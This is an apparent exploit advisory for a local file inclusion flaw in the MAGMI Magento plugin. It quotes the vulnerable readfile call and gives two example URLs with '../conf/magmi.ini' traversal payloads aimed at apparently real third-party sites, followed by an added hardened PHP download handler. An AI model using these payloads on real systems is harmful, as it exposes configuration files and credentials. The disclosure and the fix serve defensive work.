
Magento Server MAGMI Plugin Local File Inclusion

Author: lOv3rDns , Published: 22-06-2015
Title :  Magento Server MAGMI Plugin Local File Inclusion
Author : Lov3rDns
PageHome : http://pastebin.com/u/dnsx3
4U : Exploit4arab.net
Software : http://sourceforge.net/projects/magmi/
Date: 16-6-2015

The vulnerable code is as follows [ /web/download_file.php Line : 26 ]

$file = $_REQUEST["file"];
readfile($file); # < hah !

Example :

http://demo.meigeeteam.com/shopgram-magento-theme/magmi/web/download_file.php?file=../conf/magmi.ini

http://mail.nupathe.com/hotelsboutiquespain.comx/magentomassim/web/download_file.php?file=../conf/magmi.ini
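A hardened counterpart to the `readfile($file)` call shown above, as an added example that is not MAGMI's own code or its official fix: the requested name is resolved with `realpath()` and served only if the result stays inside a single download directory. The `downloads` directory and the `resolve_download()` helper are assumptions made for illustration.

```php
<?php
// Added example, not taken from MAGMI. Assumption: every file that may be
// downloaded lives under one directory (hypothetical path below).

/**
 * Map a user-supplied name to a real file inside $baseDir.
 * Returns the canonical path, or null if the request must be refused.
 */
function resolve_download(string $baseDir, $requested): ?string
{
    // Reject arrays (?file[]=x), empty values and NUL bytes up front.
    if (!is_string($requested) || $requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }

    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }

    // realpath() collapses "../" segments and resolves symlinks;
    // it returns false when the target does not exist.
    $path = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($path === false || !is_file($path)) {
        return null;
    }

    // Compare against the base plus a trailing separator so that a sibling
    // such as "/srv/downloads_old" does not pass as "/srv/downloads".
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

$baseDir = __DIR__ . '/downloads';   // hypothetical location
// $_GET instead of $_REQUEST: the value should come from the query string only.
$path = resolve_download($baseDir, $_GET['file'] ?? null);

if ($path === null) {
    http_response_code(404);         // same answer for "missing" and "outside base"
    exit;
}

header('Content-Type: application/octet-stream');
header('X-Content-Type-Options: nosniff');
header('Content-Disposition: attachment; filename="' . addcslashes(basename($path), '"\\') . '"');
readfile($path);
```

With this check a request for `../conf/magmi.ini` resolves to a path outside the download directory and gets a 404 instead of the file contents.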

